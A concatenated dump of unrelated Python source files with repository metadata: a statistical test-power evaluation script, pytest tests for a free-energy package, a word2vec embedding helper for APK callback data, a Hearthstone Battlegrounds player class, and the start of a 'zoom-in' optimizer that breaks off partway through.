2022-01-26T09:54:41.000Z
|
import os
import pandas as pd
import numpy as np
from core.dataset import dataset_fn
from core.model import model_fn, get_classification_model
from core.mmdd import trainer_object_fn
from core.muks import muks
def stderr_proportion(p, n):
return np.sqrt(p * (1-p) / n)
def eval(exp_dir, exp_name, params, seed, split, sample_sizes=[10, 30, 50, 100, 500],
num_reps=100, num_permutations=1000):
"""Analysis of test power vs sample size for both MMD-D and MUKS
Args:
        exp_dir (str): experiment base directory
        exp_name (str): experiment name (hashed config)
        params (Dict): configuration dictionary with 'dataset', 'model', and 'trainer' sections
seed (int): random seed
        split (str): fold to evaluate, e.g. 'validation' or 'test'
sample_sizes (list, optional): Defaults to [10, 30, 50, 100, 500].
        num_reps (int, optional): number of repetitions for calculating rejection rates. Defaults to 100.
num_permutations (int, optional): for MMD-D permutation test. Defaults to 1000.
"""
log_dir = os.path.join(exp_dir, exp_name)
out_csv = os.path.join(log_dir, f'{split}_consistency_analysis.csv')
df = pd.DataFrame(columns=['sample_size','power', 'power_stderr',
'type_1err', 'type_1err_stderr', 'method'])
for batch_size in sample_sizes:
params['dataset']['dl']['batch_size'] = batch_size
dataloader = dataset_fn(seed=seed, params_dict=params['dataset'])
# MMD-D
model = model_fn(seed=seed, params=params['model'])
trainer = trainer_object_fn(model=model, dataloaders=dataloader, seed=seed,
log_dir=log_dir, **params['trainer'])
res = trainer.performance_measures(dataloader[split]['p'], dataloader[split]['q'], num_batches=num_reps,
num_permutations=num_permutations)
res_mmd = {'exp_hash': exp_name,
'sample_size': batch_size,
'power': res['reject_rate'],
'power_stderr': stderr_proportion(res['reject_rate'], batch_size),
'type_1err': res['type_1_err'] ,
'type_1err_stderr': stderr_proportion(res['type_1_err'] , batch_size),
'method': 'mmd'}
# MUKS
model = get_classification_model(params['model'])
reject_rate, type_1_err = muks(dataloader[split]['p'], dataloader[split]['q'], num_reps, model)
res_rabanser = {'exp_hash': exp_name,
'sample_size': batch_size,
'power': reject_rate,
'power_stderr': stderr_proportion(reject_rate, batch_size),
'type_1err': type_1_err,
'type_1err_stderr': stderr_proportion(type_1_err, batch_size),
'method': 'rabanser'}
print('---------------------------------')
print(f'sample size: {batch_size}')
print(f'mmd: {res_mmd}')
print(f'rabanser: {res_rabanser}')
        # pandas removed DataFrame.append in 2.0; pd.concat is the supported equivalent
        df = pd.concat([df, pd.DataFrame(res_mmd, index=[''])], ignore_index=True)
        df = pd.concat([df, pd.DataFrame(res_rabanser, index=[''])], ignore_index=True)
df.to_csv(out_csv)
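For reference, stderr_proportion implements the standard error of a binomial proportion, sqrt(p * (1 - p) / n). A quick standalone sanity check with illustrative values:

import numpy as np

p, n = 0.5, 100
# the worst case p = 0.5 with n = 100 trials gives a standard error of 0.05
assert abs(np.sqrt(p * (1 - p) / n) - 0.05) < 1e-12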
| 41.4375
| 112
| 0.574962
| 397
| 3,315
| 4.554156
| 0.284635
| 0.049779
| 0.022124
| 0.031527
| 0.289823
| 0.266593
| 0.143805
| 0.084071
| 0.042035
| 0
| 0
| 0.021478
| 0.297738
| 3,315
| 79
| 113
| 41.962025
| 0.755155
| 0.161086
| 0
| 0.043478
| 0
| 0
| 0.154043
| 0.023783
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.152174
| 0.021739
| 0.217391
| 0.086957
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a59c22cef1a85002b71aba681bd1b6e2ffee762e
| 7,344
|
py
|
Python
|
absolv/tests/test_models.py
|
SimonBoothroyd/absolv
|
dedb2b6eb567ec1b627dbe50f36f68e0c32931c4
|
[
"MIT"
] | null | null | null |
absolv/tests/test_models.py
|
SimonBoothroyd/absolv
|
dedb2b6eb567ec1b627dbe50f36f68e0c32931c4
|
[
"MIT"
] | 30
|
2021-11-02T12:47:24.000Z
|
2022-03-01T22:00:39.000Z
|
absolv/tests/test_models.py
|
SimonBoothroyd/absolv
|
dedb2b6eb567ec1b627dbe50f36f68e0c32931c4
|
[
"MIT"
] | null | null | null |
import numpy
import pytest
from openmm import unit
from pydantic import ValidationError
from absolv.models import (
DeltaG,
EquilibriumProtocol,
MinimizationProtocol,
SimulationProtocol,
State,
SwitchingProtocol,
System,
TransferFreeEnergyResult,
)
from absolv.tests import is_close
class TestSystem:
def test_n_solute_molecules(self):
system = System(solutes={"CO": 2, "CCO": 3}, solvent_a={"O": 1}, solvent_b=None)
assert system.n_solute_molecules == 5
@pytest.mark.parametrize("solvent_a, n_expected", [({"O": 3}, 3), (None, 0)])
def test_n_solvent_molecules_a(self, solvent_a, n_expected):
system = System(
solutes={
"CO": 1,
},
solvent_a=solvent_a,
solvent_b={"O": 5},
)
assert system.n_solvent_molecules_a == n_expected
@pytest.mark.parametrize("solvent_b, n_expected", [({"O": 5}, 5), (None, 0)])
def test_n_solvent_molecules_b(self, solvent_b, n_expected):
system = System(
solutes={
"CO": 1,
},
solvent_a={"O": 3},
solvent_b=solvent_b,
)
assert system.n_solvent_molecules_b == n_expected
def test_validate_solutes(self):
with pytest.raises(
ValidationError, match="at least one solute must be specified"
):
System(solutes={}, solvent_a=None, solvent_b=None)
system = System(solutes={"C": 1}, solvent_a=None, solvent_b=None)
assert system.solutes == {"C": 1}
def test_validate_solvent_a(self):
with pytest.raises(
ValidationError, match="specified when `solvent_a` is not none"
):
System(solutes={"C": 1}, solvent_a={}, solvent_b=None)
system = System(solutes={"C": 1}, solvent_a={"O": 2}, solvent_b=None)
assert system.solvent_a == {"O": 2}
def test_validate_solvent_b(self):
with pytest.raises(
ValidationError, match="specified when `solvent_b` is not none"
):
System(solutes={"C": 1}, solvent_a=None, solvent_b={})
system = System(solutes={"C": 1}, solvent_a=None, solvent_b={"O": 2})
assert system.solvent_b == {"O": 2}
def test_to_components(self):
system = System(
solutes={"CO": 1, "CCO": 2}, solvent_a={"O": 3}, solvent_b={"OCO": 4}
)
components_a, components_b = system.to_components()
assert components_a == [("CO", 1), ("CCO", 2), ("O", 3)]
assert components_b == [("CO", 1), ("CCO", 2), ("OCO", 4)]
class TestState:
def test_unit_validation(self):
state = State(
temperature=298.0 * unit.kelvin, pressure=101.325 * unit.kilopascals
)
assert is_close(state.temperature, 298.0)
assert is_close(state.pressure, 1.0)
class TestMinimizationProtocol:
def test_unit_validation(self):
protocol = MinimizationProtocol(
tolerance=1.0 * unit.kilojoule_per_mole / unit.angstrom
)
assert is_close(protocol.tolerance, 10.0)
class TestSimulationProtocol:
def test_unit_validation(self):
protocol = SimulationProtocol(
n_steps_per_iteration=1,
n_iterations=1,
timestep=0.002 * unit.picoseconds,
thermostat_friction=0.003 / unit.femtoseconds,
)
assert is_close(protocol.timestep, 2.0)
assert is_close(protocol.thermostat_friction, 3.0)
class TestEquilibriumProtocol:
def test_n_states(self):
protocol = EquilibriumProtocol(
lambda_sterics=[1.0, 0.5, 0.0], lambda_electrostatics=[1.0, 1.0, 1.0]
)
assert protocol.n_states == 3
@pytest.mark.parametrize(
"lambda_sterics, lambda_electrostatics",
[([1.0, 0.5, 0.0], [1.0, 1.0]), ([1.0, 0.5], [1.0, 1.0, 1.0])],
)
def test_validate_lambda_lengths(self, lambda_sterics, lambda_electrostatics):
with pytest.raises(ValidationError, match="lambda lists must be the same"):
EquilibriumProtocol(
lambda_sterics=lambda_sterics,
lambda_electrostatics=lambda_electrostatics,
)
class TestSwitchingProtocol:
def test_unit_validation(self):
protocol = SwitchingProtocol(
n_electrostatic_steps=6250,
n_steps_per_electrostatic_step=1,
n_steric_steps=18750,
n_steps_per_steric_step=1,
timestep=0.002 * unit.picoseconds,
thermostat_friction=0.003 / unit.femtoseconds,
)
assert is_close(protocol.timestep, 2.0)
assert is_close(protocol.thermostat_friction, 3.0)
class TestDeltaG:
def test_add(self):
value_a = DeltaG(value=1.0, std_error=2.0)
value_b = DeltaG(value=3.0, std_error=4.0)
result = value_a + value_b
assert is_close(result.value, 4.0)
assert is_close(result.std_error, numpy.sqrt(20))
def test_sub(self):
value_a = DeltaG(value=1.0, std_error=2.0)
value_b = DeltaG(value=3.0, std_error=4.0)
result = value_b - value_a
assert is_close(result.value, 2.0)
assert is_close(result.std_error, numpy.sqrt(20))
class TestTransferFreeEnergyResult:
@pytest.fixture()
def free_energy_result(self, argon_eq_schema):
return TransferFreeEnergyResult(
input_schema=argon_eq_schema,
delta_g_solvent_a=DeltaG(value=1.0, std_error=2.0),
delta_g_solvent_b=DeltaG(value=3.0, std_error=4.0),
)
def test_delta_g_from_a_to_b(self, free_energy_result):
delta_g = free_energy_result.delta_g_from_a_to_b
assert is_close(delta_g.value, -2.0)
assert is_close(delta_g.std_error, numpy.sqrt(20))
def test_delta_g_from_b_to_a(self, free_energy_result):
delta_g = free_energy_result.delta_g_from_b_to_a
assert is_close(delta_g.value, 2.0)
assert is_close(delta_g.std_error, numpy.sqrt(20))
def test_boltzmann_temperature(self, free_energy_result):
value = free_energy_result._boltzmann_temperature
assert is_close(value, 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R)
def test_delta_g_from_a_to_b_with_units(self, free_energy_result):
value, std_error = free_energy_result.delta_g_from_a_to_b_with_units
assert is_close(value, -2.0 * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R)
assert is_close(
std_error, numpy.sqrt(20) * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R
)
def test_delta_g_from_b_to_a_with_units(self, free_energy_result):
value, std_error = free_energy_result.delta_g_from_b_to_a_with_units
assert is_close(value, 2.0 * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R)
assert is_close(
std_error, numpy.sqrt(20) * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R
)
def test_str(self, free_energy_result):
assert (
str(free_energy_result)
== "ฮG a->b=-0.340 kcal/mol ฮG a->b std=0.760 kcal/mol"
)
def test_repr(self, free_energy_result):
assert repr(free_energy_result) == (
"TransferFreeEnergyResult(ฮG a->b=-0.340 kcal/mol ฮG a->b std=0.760 kcal/mol)"
)
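The TestDeltaG cases pin down the arithmetic: values add or subtract while standard errors combine in quadrature (sqrt(2**2 + 4**2) = sqrt(20)). Below is a standalone sketch of that propagation, assuming independent uncertainties; the real DeltaG in absolv.models is a pydantic model, and this dataclass only mirrors the math:

import math
from dataclasses import dataclass

@dataclass
class DeltaGSketch:
    value: float
    std_error: float

    def __add__(self, other):
        # values add; independent errors combine in quadrature
        return DeltaGSketch(self.value + other.value,
                            math.sqrt(self.std_error ** 2 + other.std_error ** 2))

    def __sub__(self, other):
        # subtraction changes the value but not the error combination
        return DeltaGSketch(self.value - other.value,
                            math.sqrt(self.std_error ** 2 + other.std_error ** 2))

result = DeltaGSketch(1.0, 2.0) + DeltaGSketch(3.0, 4.0)
assert result.value == 4.0 and abs(result.std_error - math.sqrt(20)) < 1e-12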
| 30.473029
| 90
| 0.631672
| 984
| 7,344
| 4.428862
| 0.142276
| 0.035337
| 0.05966
| 0.022487
| 0.560119
| 0.479807
| 0.429555
| 0.41464
| 0.404773
| 0.327214
| 0
| 0.037356
| 0.2564
| 7,344
| 240
| 91
| 30.6
| 0.760667
| 0
| 0
| 0.216374
| 0
| 0.011696
| 0.053649
| 0.006536
| 0
| 0
| 0
| 0
| 0.181287
| 1
| 0.134503
| false
| 0
| 0.035088
| 0.005848
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a08838db67fdc32c63308d4dd034cb11ff2a45
| 3,745
|
py
|
Python
|
src/FSG/WordEmbedding.py
|
handsomebrothers/Callback2Vec
|
370adbcfcc229d385ba9c8c581489b703a39ca85
|
[
"MIT"
] | null | null | null |
src/FSG/WordEmbedding.py
|
handsomebrothers/Callback2Vec
|
370adbcfcc229d385ba9c8c581489b703a39ca85
|
[
"MIT"
] | null | null | null |
src/FSG/WordEmbedding.py
|
handsomebrothers/Callback2Vec
|
370adbcfcc229d385ba9c8c581489b703a39ca85
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import multiprocessing
from gensim.models import Word2Vec
import csv
def embedding_sentences(sentences, embedding_size = 64, window = 3, min_count = 0, file_to_load = None, file_to_save = None):
'''
    embedding_size: word embedding dimension
    window: context window size
    min_count: words with frequency below min_count are dropped
'''
if file_to_load is not None:
w2vModel = Word2Vec.load(file_to_load) # load model
else:
w2vModel = Word2Vec(sentences, size = embedding_size, window = window, min_count = min_count, workers = multiprocessing.cpu_count(),seed=200)
if file_to_save is not None:
w2vModel.save(file_to_save) # Save Model
return w2vModel
# This function is used to represent a sentence as a vector (corresponding to representing a method as a vector)
def get_method_vector(sentence,w2vModel):
sentence_vector=[]
for word in sentence:
        sentence_vector.append(w2vModel[word])  # append each word's vector
return sentence_vector
# This function is used to represent a word as a vector (corresponding to a word in method)
def get_word_vector(word,w2vModel):
return w2vModel[word]
# This function is used to get the vector of a text (corresponding to the word vector of class or apk)
def get_apk_class_vector(document,w2vModel):
all_vectors = []
embeddingDim = w2vModel.vector_size
    # embedding dimension; unknown words map to a zero vector of this size
embeddingUnknown = [0 for i in range(embeddingDim)]
for sentence in document:
this_vector = []
for word in sentence:
if word in w2vModel.wv.vocab:
this_vector.append(w2vModel[word])
else:
this_vector.append(embeddingUnknown)
all_vectors.append(this_vector)
return all_vectors
# This function is used to obtain the similarity between two sentences,
# with the help of python's own function to calculate the similarity.
def get_two_sentence_simility(sentence1,sentence2,w2vModel):
sim = w2vModel.n_similarity(sentence1, sentence2)
return sim
# Used to build the word2vec model from the corpus
def build_word2vec_model():
model = embedding_sentences(get_corpus_(), embedding_size=32,
min_count=0,
file_to_save='D:\\APK_็ง็ \\word2vec\\apk_trained_word2vec.model')
return model
# Used to get the model that has been created
def get_already_word2vec_model(file_to_load):
model = Word2Vec.load(file_to_load)
return model
# Used for acquiring corpus
def get_corpus():
all_data=[]
data_readers=csv.reader(open('D:/new_amd_callback_data1.csv'))
for reader in data_readers:
if len(reader)>1:
# print(reader)
all_data.append(reader)
amd_data_readers=csv.reader(open('D:/new_callback_data1.csv'))
for amd_reader in amd_data_readers:
if len(amd_reader)>1:
# print(amd_reader)
all_data.append(amd_reader)
print('over')
return all_data
def get_corpus_():
all_data = []
data_readers = csv.reader(open('D:/new_amd_callback_data.csv'))
for reader in data_readers:
if len(reader) > 1:
# print(reader)
all_data.append(reader)
amd_data_readers = csv.reader(open('D:/new_amd_callback_data1.csv'))
for amd_reader in amd_data_readers:
if len(amd_reader) > 1:
# print(amd_reader)
all_data.append(amd_reader)
amd_data_readers_=csv.reader(open('D:/new_callback_data.csv'))
for amd_reader_ in amd_data_readers_:
if len(amd_reader_)>1:
all_data.append(amd_reader_)
print('over')
return all_data
if __name__ == "__main__":
    build_word2vec_model()
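A minimal usage sketch with a toy corpus (the tokens are hypothetical; this assumes a gensim 3.x environment, where Word2Vec accepts size= and supports model[word] lookups as the code above does; gensim >= 4.0 renamed the keyword to vector_size and reads vectors via model.wv[word]):

toy_sentences = [["onClick", "startActivity"], ["onCreate", "setContentView"]]
model = embedding_sentences(toy_sentences, embedding_size=8, window=2, min_count=0)
vectors = get_method_vector(["onClick", "startActivity"], model)
print(len(vectors), len(vectors[0]))  # 2 words, each mapped to an 8-dimensional vector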
| 40.706522
| 149
| 0.687316
| 522
| 3,745
| 4.681992
| 0.233716
| 0.040507
| 0.03437
| 0.040917
| 0.380115
| 0.295008
| 0.295008
| 0.270458
| 0.270458
| 0.270458
| 0
| 0.016661
| 0.230708
| 3,745
| 91
| 150
| 41.153846
| 0.831656
| 0.223765
| 0
| 0.333333
| 0
| 0
| 0.069435
| 0.063852
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.041667
| 0.013889
| 0.291667
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a1b481c21e6820b7064b6612f4c7a3b1370fc4
| 10,914
|
py
|
Python
|
hearthstone/player.py
|
dianarvp/stone_ground_hearth_battles
|
450e70eaef21b543be579a6d696676fb148a99b0
|
[
"Apache-2.0"
] | null | null | null |
hearthstone/player.py
|
dianarvp/stone_ground_hearth_battles
|
450e70eaef21b543be579a6d696676fb148a99b0
|
[
"Apache-2.0"
] | null | null | null |
hearthstone/player.py
|
dianarvp/stone_ground_hearth_battles
|
450e70eaef21b543be579a6d696676fb148a99b0
|
[
"Apache-2.0"
] | null | null | null |
import itertools
import typing
from collections import defaultdict
from typing import Optional, List, Callable, Type
from hearthstone.cards import MonsterCard, CardEvent, Card
from hearthstone.events import BuyPhaseContext, EVENTS
from hearthstone.hero import EmptyHero
from hearthstone.monster_types import MONSTER_TYPES
from hearthstone.triple_reward_card import TripleRewardCard
if typing.TYPE_CHECKING:
from hearthstone.tavern import Tavern
from hearthstone.hero import Hero
from hearthstone.randomizer import Randomizer
class BuyPhaseEvent:
pass
StoreIndex = typing.NewType("StoreIndex", int)
HandIndex = typing.NewType("HandIndex", int)
BoardIndex = typing.NewType("BoardIndex", int)
class Player:
def __init__(self, tavern: 'Tavern', name: str, hero_options: List['Hero']):
self.name = name
self.tavern = tavern
self.hero = None
self.hero_options = hero_options
self.health = None
self.tavern_tier = 1
self.coins = 0
self.triple_rewards = []
self.discovered_cards: List[MonsterCard] = []
self.maximum_board_size = 7
self.maximum_hand_size = 10
self.refresh_store_cost = 1
self._tavern_upgrade_costs = (0, 5, 7, 8, 9, 10)
self.tavern_upgrade_cost = 5
self.hand: List[MonsterCard] = []
self.in_play: List[MonsterCard] = []
self.store: List[MonsterCard] = []
self.frozen = False
self.counted_cards = defaultdict(lambda: 0)
@staticmethod
def new_player_with_hero(tavern: 'Tavern', name: str, hero: Optional['Hero'] = None) -> 'Player':
if hero is None:
hero = EmptyHero()
player = Player(tavern, name, [hero])
player.choose_hero(hero)
return player
@property
def coin_income_rate(self):
return min(self.tavern.turn_count + 3, 10)
def player_main_step(self):
self.draw()
# player can:
# rearrange monsters
# summon monsters
# buy from the store
# freeze the store
# refresh the store
# sell monsters
# set fight ready
def apply_turn_start_income(self):
self.coins = self.coin_income_rate
def decrease_tavern_upgrade_cost(self):
self.tavern_upgrade_cost = max(0, self.tavern_upgrade_cost - 1)
def upgrade_tavern(self):
assert self.validate_upgrade_tavern()
self.coins -= self.tavern_upgrade_cost
self.tavern_tier += 1
if self.tavern_tier < self.max_tier():
self.tavern_upgrade_cost = self._tavern_upgrade_costs[self.tavern_tier]
def validate_upgrade_tavern(self) -> bool:
if self.tavern_tier >= self.max_tier():
return False
if self.coins < self.tavern_upgrade_cost:
return False
return True
def summon_from_hand(self, index: HandIndex, targets: Optional[List[BoardIndex]] = None):
# TODO: add (optional?) destination index parameter for Defender of Argus
# TODO: make sure that the ordering of monster in hand and monster.battlecry are correct
# TODO: Jarett can monster be event target
if targets is None:
targets = []
assert self.validate_summon_from_hand(index, targets)
card = self.hand.pop(index)
self.in_play.append(card)
if card.golden:
self.triple_rewards.append(TripleRewardCard(min(self.tavern_tier + 1, 6)))
if card.magnetic:
self.check_magnetic(card)
target_cards = [self.in_play[target] for target in targets]
self.broadcast_buy_phase_event(CardEvent(card, EVENTS.SUMMON_BUY, target_cards))
def validate_summon_from_hand(self, index: HandIndex, targets: Optional[List[BoardIndex]] = None) -> bool:
if targets is None:
targets = []
# TODO: Jack num_battlecry_targets should only accept 0,1,2
if index not in range(len(self.hand)):
return False
card = self.hand[index]
if not self.room_on_board():
return False
valid_targets = [target_index for target_index, target_card in enumerate(self.in_play) if
card.validate_battlecry_target(target_card)]
num_possible_targets = min(len(valid_targets), card.num_battlecry_targets)
if len(targets) != num_possible_targets:
return False
if len(set(targets)) != len(targets):
return False
for target in targets:
if target not in valid_targets:
return False
return True
def play_triple_rewards(self):
if not self.triple_rewards:
return
discover_tier = self.triple_rewards.pop(-1).level
self.draw_discover(lambda card: card.tier == discover_tier)
def validate_triple_rewards(self) -> bool:
return bool(self.triple_rewards)
def draw_discover(self, predicate: Callable[[Card], bool]):
discoverables = [card for card in self.tavern.deck.all_cards() if predicate(card)]
for _ in range(3):
self.discovered_cards.append(self.tavern.randomizer.select_discover_card(discoverables))
discoverables.remove(self.discovered_cards[-1])
self.tavern.deck.remove_card(self.discovered_cards[-1])
def select_discover(self, card: Card):
assert (card in self.discovered_cards)
assert (isinstance(card, MonsterCard)) # TODO: discover other card types
self.discovered_cards.remove(card)
self.hand.append(card)
self.tavern.deck.return_cards(itertools.chain.from_iterable([card.dissolve() for card in self.discovered_cards]))
self.discovered_cards = []
self.check_golden(type(card))
def summon_from_void(self, monster: MonsterCard):
if self.room_on_board():
self.in_play.append(monster)
self.check_golden(type(monster))
self.broadcast_buy_phase_event(CardEvent(monster, EVENTS.SUMMON_BUY))
def room_on_board(self):
return len(self.in_play) < self.maximum_board_size
def draw(self):
if self.frozen:
self.frozen = False
else:
self.return_cards()
number_of_cards = 3 + self.tavern_tier // 2 - len(self.store)
self.store.extend([self.tavern.deck.draw(self) for _ in range(number_of_cards)])
def purchase(self, index: StoreIndex):
# check if the index is valid
assert self.validate_purchase(index)
card = self.store.pop(index)
self.coins -= card.coin_cost
self.hand.append(card)
event = CardEvent(card, EVENTS.BUY)
self.broadcast_buy_phase_event(event)
self.check_golden(type(card))
def validate_purchase(self, index: StoreIndex) -> bool:
if index not in range(len(self.store)):
return False
if self.coins < self.store[index].coin_cost:
return False
if not self.room_in_hand():
return False
return True
def check_golden(self, check_card: Type[MonsterCard]):
cards = [card for card in self.in_play + self.hand if isinstance(card, check_card) and not card.golden]
assert len(cards) <= 3, f"fnord{cards}"
if len(cards) == 3:
for card in cards:
if card in self.in_play:
self.in_play.remove(card)
if card in self.hand:
self.hand.remove(card)
golden_card = check_card()
golden_card.golden_transformation(cards)
self.hand.append(golden_card)
def check_magnetic(self, card):
# TODO: decide if magnetic should be implemented using targets
index = self.in_play.index(card)
assert card.magnetic
if index + 1 in range(len(self.in_play)) and self.in_play[index + 1].monster_type in (MONSTER_TYPES.MECH, MONSTER_TYPES.ALL):
mech = self.in_play[index + 1]
self.in_play.remove(card)
mech.magnetic_transformation(card)
def reroll_store(self):
assert self.validate_reroll()
self.coins -= self.refresh_store_cost
self.return_cards()
self.draw()
def validate_reroll(self) -> bool:
return self.coins >= self.refresh_store_cost
def return_cards(self):
self.tavern.deck.return_cards(itertools.chain.from_iterable([card.dissolve() for card in self.store]))
self.store = []
def freeze(self):
self.frozen = True
def _sell_minion(self, location: List[MonsterCard], index: int):
assert self._validate_sell_minion(location, index)
self.broadcast_buy_phase_event(CardEvent(location[index], EVENTS.SELL))
card = location.pop(index)
self.coins += card.redeem_rate
self.tavern.deck.return_cards(card.dissolve())
def sell_hand_minion(self, index: HandIndex):
return self._sell_minion(self.hand, index)
def sell_board_minion(self, index: BoardIndex):
return self._sell_minion(self.in_play, index)
@staticmethod
def _validate_sell_minion(location: List[MonsterCard], index: int) -> bool:
return index in range(len(location))
def validate_sell_hand_minion(self, index: HandIndex) -> bool:
return self._validate_sell_minion(self.hand, index)
def validate_sell_board_minion(self, index: BoardIndex) -> bool:
return self._validate_sell_minion(self.in_play, index)
def hero_power(self):
self.hero.hero_power(BuyPhaseContext(self, self.tavern.randomizer))
def validate_hero_power(self) -> bool:
return self.hero.hero_power_valid(BuyPhaseContext(self, self.tavern.randomizer))
def broadcast_buy_phase_event(self, event: CardEvent, randomizer: Optional['Randomizer'] = None):
self.hero.handle_event(event, BuyPhaseContext(self, randomizer or self.tavern.randomizer))
for card in self.in_play.copy():
card.handle_event(event, BuyPhaseContext(self, randomizer or self.tavern.randomizer))
for card in self.hand.copy():
card.handle_event_in_hand(event, BuyPhaseContext(self, randomizer or self.tavern.randomizer))
def hand_size(self):
return len(self.hand) + len(self.triple_rewards)
def room_in_hand(self):
return self.hand_size() < self.maximum_hand_size
def max_tier(self):
return len(self._tavern_upgrade_costs)
def choose_hero(self, hero: 'Hero'):
assert(self.validate_choose_hero(hero))
self.hero = hero
self.hero_options = []
self.health = self.hero.starting_health()
self._tavern_upgrade_costs = self.hero.tavern_upgrade_costs()
self.tavern_upgrade_cost = self.hero.tavern_upgrade_costs()[1]
def validate_choose_hero(self, hero: 'Hero'):
return self.hero is None and hero in self.hero_options
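A standalone sketch of the tavern-tier economics encoded in _tavern_upgrade_costs (illustrative only, not using the Player API): each call to decrease_tavern_upgrade_cost discounts the next upgrade by one coin, floored at zero, and upgrading re-reads the cost table for the new tier.

costs = (0, 5, 7, 8, 9, 10)              # mirrors Player._tavern_upgrade_costs
tier, upgrade_cost = 1, costs[1]
upgrade_cost = max(0, upgrade_cost - 1)  # one turn of discount: 5 -> 4
tier += 1                                # pay the (discounted) cost and upgrade
upgrade_cost = costs[tier]               # the next upgrade, tier 2 -> 3, costs 7
print(tier, upgrade_cost)                # 2 7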
| 38.702128
| 133
| 0.660711
| 1,390
| 10,914
| 4.988489
| 0.133094
| 0.047592
| 0.024517
| 0.0212
| 0.287424
| 0.197
| 0.096914
| 0.07182
| 0.063744
| 0.063744
| 0
| 0.004618
| 0.246014
| 10,914
| 281
| 134
| 38.839858
| 0.838012
| 0.047645
| 0
| 0.13964
| 0
| 0
| 0.008191
| 0
| 0
| 0
| 0
| 0.003559
| 0.045045
| 1
| 0.175676
| false
| 0.004505
| 0.054054
| 0.063063
| 0.369369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a2a13b3d7e2462a415df9e5bf700f91ae466fd
| 12,743
|
py
|
Python
|
PyStationB/libraries/ABEX/abex/optimizers/zoom_optimizer.py
|
BrunoKM/station-b-libraries
|
ea3591837e4a33f0bef789d905467754c27913b3
|
[
"MIT"
] | 6
|
2021-09-29T15:46:55.000Z
|
2021-12-14T18:39:51.000Z
|
PyStationB/libraries/ABEX/abex/optimizers/zoom_optimizer.py
|
BrunoKM/station-b-libraries
|
ea3591837e4a33f0bef789d905467754c27913b3
|
[
"MIT"
] | null | null | null |
PyStationB/libraries/ABEX/abex/optimizers/zoom_optimizer.py
|
BrunoKM/station-b-libraries
|
ea3591837e4a33f0bef789d905467754c27913b3
|
[
"MIT"
] | 3
|
2021-09-27T10:35:20.000Z
|
2021-10-02T17:53:07.000Z
|
# -------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# -------------------------------------------------------------------------------------------
"""A submodule implementing "zooming in" (Biological) optimization strategy.
This optimization strategy has a single hyperparameter :math:`s`, called the *shrinking factor*.
It consists of of the following steps:
1. The optimization space is a hypercuboid
.. math::
C = [a_1, b_1] \\times [a_2, b_2] \\times \\cdots \\times [a_n, b_n].
2. Find the optimum :math:`x=(x_1, x_2, \\dots, x_n)` among the already collected samples.
3. Construct a new hypercuboid :math:`D` centered at :math:`x`. If this is the :math:`N`th optimization step, the
volume of :math:`D` is given by
.. math::
\\mathrm{vol}\\, D = s^N \\cdot \\mathrm{vol}\\, C
Step :math:`N` is either provided in the configuration file or is estimated as ``n_samples/batch_size``.
4. If :math:`D` is not a subset of :math:`C`, we translate it by a vector.
5. To suggest a new batch we sample the hypercuboid :math:`D`. Many different sampling methods are available, see
:ref:`abex.sample_designs` for this. For example, we can construct a grid, sample in a random way or use Latin
or Sobol sampling.
"""
from pathlib import Path
from typing import List, Tuple
import abex.optimizers.optimizer_base as base
import numpy as np
import pandas as pd
from abex import space_designs as designs
from abex.dataset import Dataset
from abex.settings import OptimizationStrategy, ZoomOptSettings
from emukit.core import ContinuousParameter, ParameterSpace
Interval = Tuple[float, float] # Endpoints of an interval
Hypercuboid = List[Interval] # Optimization space is represented by a rectangular box
class ZoomOptimizer(base.OptimizerBase):
strategy_name = OptimizationStrategy.ZOOM.value
def run(self) -> Tuple[Path, pd.DataFrame]:
"""
Optimizes function using "zooming in" strategy -- around observed maximum a new "shrunk" space is selected. We
sample this space (e.g. using grid sampling or random sampling) to suggest new observations.
Note:
This method should not work well with very noisy functions or functions having a non-unique maximum. A more
robust alternative (as Bayes optimization) should be preferred. On the other hand, this method is much
faster to compute.
Returns:
path to the CSV with locations of new samples to be collected
data frame with locations of new samples to be collected
Raises:
ValueError, if batch size is less than 1
"""
# Construct the data set
dataset: Dataset = self.construct_dataset()
assert (
self.config.zoomopt is not None
), "You need to set the 'zoomopt' field in the config to use Zoom optimizer."
batch_transformed_space: np.ndarray = _suggest_samples(dataset=dataset, settings=self.config.zoomopt)
# Transform the batch back to original space
batch_original_space: pd.DataFrame = self.suggestions_to_original_space(
dataset=dataset, new_samples=batch_transformed_space
)
# Save the batch to the disk and return it
batch_original_space.to_csv(self.config.experiment_batch_path, index=False)
# Save the inferred optimum
optimum = evaluate_optimum(dataset)
